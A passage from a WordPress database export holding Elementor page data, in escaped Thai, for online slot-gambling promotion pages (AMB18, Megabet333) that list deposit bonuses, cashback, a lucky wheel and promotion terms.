data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18.webp\",\"id\":362,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18.webp\",\"id\":358,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07\\u00a0<\\/strong><b>AMB18\\u00a0<\\/b>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\"><span data-start=\\\"2414\\\" data-end=\\\"2445\\\"><b>AMB18 \\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/b><\\/span>\\u00a0\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(337,66,'_elementor_edit_mode','builder'),(338,66,'_elementor_template_type','wp-page'),(339,66,'_elementor_version','3.32.5'),(340,66,'_elementor_pro_version','3.32.3'),(341,66,'_wp_page_template','default'),(342,66,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(343,66,'_elementor_data','[]'),(345,67,'_elementor_edit_mode','builder'),(346,67,'_elementor_template_type','wp-page'),(347,67,'_elementor_version','3.32.5'),(348,67,'_elementor_pro_version','3.32.3'),(349,67,'_wp_page_template','default'),(350,67,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(351,67,'_elementor_data','[]'),(353,68,'_elementor_edit_mode','builder'),(354,68,'_elementor_template_type','wp-page'),(355,68,'_elementor_version','3.32.5'),(356,68,'_elementor_pro_version','3.32.3'),(357,68,'_wp_page_template','default'),(358,68,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(359,68,'_elementor_data','[]'),(362,69,'_elementor_edit_mode','builder'),(363,69,'_elementor_template_type','wp-page'),(364,69,'_elementor_version','3.32.5'),(365,69,'_elementor_pro_version','3.32.3'),(366,69,'_wp_page_template','default'),(367,69,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(368,69,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(373,70,'_elementor_edit_mode','builder'),(374,70,'_elementor_template_type','wp-page'),(375,70,'_elementor_version','3.32.5'),(376,70,'_elementor_pro_version','3.32.3'),(377,70,'_wp_page_template','default'),(378,70,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(379,70,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(382,71,'_elementor_edit_mode','builder'),(383,71,'_elementor_template_type','wp-page'),(384,71,'_elementor_version','3.32.5'),(385,71,'_elementor_pro_version','3.32.3'),(386,71,'_wp_page_template','default'),(387,71,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(388,71,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% 